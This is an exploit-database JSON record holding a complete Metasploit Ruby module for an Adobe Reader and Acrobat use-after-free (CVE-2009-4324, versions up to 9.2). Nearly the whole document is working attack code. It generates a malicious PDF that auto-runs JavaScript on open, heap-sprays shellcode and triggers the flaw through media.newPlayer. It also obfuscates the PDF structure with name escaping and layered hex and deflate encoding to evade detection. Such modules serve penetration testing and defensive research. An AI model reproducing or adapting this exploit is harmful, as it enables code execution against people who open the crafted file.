Local exploit for windows platform", "modified": "2010-09-25T00:00:00", "published": "2010-09-25T00:00:00", "id": "EDB-ID:16623", "href": "https://www.exploit-db.com/exploits/16623/", "type": "exploitdb", "title": "Adobe Doc.media.newPlayer Use After Free Vulnerability", "sourceData": "##\r\n# $Id: adobe_media_newplayer.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\r\n\t\t\t\tProfessional versions up to and including 9.2.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'unknown', # Found in the wild\r\n\t\t\t\t\t# Metasploit version by:\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t\t'pusscat',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-4324' ],\r\n\t\t\t\t\t[ 'BID', '37331' ],\r\n\t\t\t\t\t[ 'OSVDB', '60980' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops'\t => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 
6.0.1 - vulnerable / doesn't work\r\n\t\t\t\t\t# reader 7.0.5 - untested\r\n\t\t\t\t\t# reader 7.0.8 - untested\r\n\t\t\t\t\t# reader 7.0.9 - vulnerable / doesn't work\r\n\t\t\t\t\t# reader 7.1.0 - untested\r\n\t\t\t\t\t# reader 7.1.1 - untested\r\n\t\t\t\t\t# reader 8.0.0 - untested\r\n\t\t\t\t\t# reader 8.1.1 - works\r\n\t\t\t\t\t# reader 8.1.2 - untested\r\n\t\t\t\t\t# reader 8.1.3 - untested\r\n\t\t\t\t\t# reader 8.1.4 - untested\r\n\t\t\t\t\t# reader 8.1.5 - untested\r\n\t\t\t\t\t# reader 8.1.6 - untested\r\n\t\t\t\t\t# reader 9.0.0 - untested\r\n\t\t\t\t\t# reader 9.1.0 - works\r\n\t\t\t\t\t# reader 9.2 - works (no debugger, no DEP)\r\n\t\t\t\t\t[ 'Adobe Reader Windows English (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size'\t\t=> (0x10000/2),\r\n\t\t\t\t\t\t\t'Ret' => 0x0c0c0c0c,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Adobe Reader Windows German (JS Heap Spray)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Size'\t\t=> (0x10000/2),\r\n\t\t\t\t\t\t\t'Ret' => 0x0a0a0a0a,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 14 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape([target.ret].pack('V'))\r\n\r\n\t\t# Randomize variables\r\n\t\t#\r\n\t\tlen = 72\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\t\trand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\r\n\t\tvtbuf = [target.ret].pack('V') * 4\r\n\t\tvtbuf << rand_text_alpha(len - 
vtbuf.length)\r\n\t\tvtbuf.gsub!(/([dhHjmMsty])/m, '\\\\\\\\' + '\\1')\r\n\t\tretstring = Rex::Text.to_unescape(vtbuf)\r\n\r\n\t\t# The printd strings are 72 bytes (??)\r\n\t\tscript = %Q|\r\nvar #{rand1} = unescape(\"#{shellcode}\");\r\nvar #{rand2} = unescape(\"#{nops}\");\r\nvar #{rand3} = unescape(\"#{retstring}\");\r\n\r\nwhile(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};\r\n\t#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);\r\n\r\nmemory=new Array();\r\n\r\nfor(i=0;i<0x2000;i++) {\r\n\tmemory[i]= #{rand2} + #{rand1};\r\n}\r\n\r\nutil.printd(\"#{rand4}\", new Date());\r\nutil.printd(\"#{rand5}\", new Date());\r\ntry {this.media.newPlayer(null);} catch(e) {}\r\nutil.printd(#{rand3}, new Date());\r\n|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\r\n\tend\r\n\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << 
eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16623/"}]}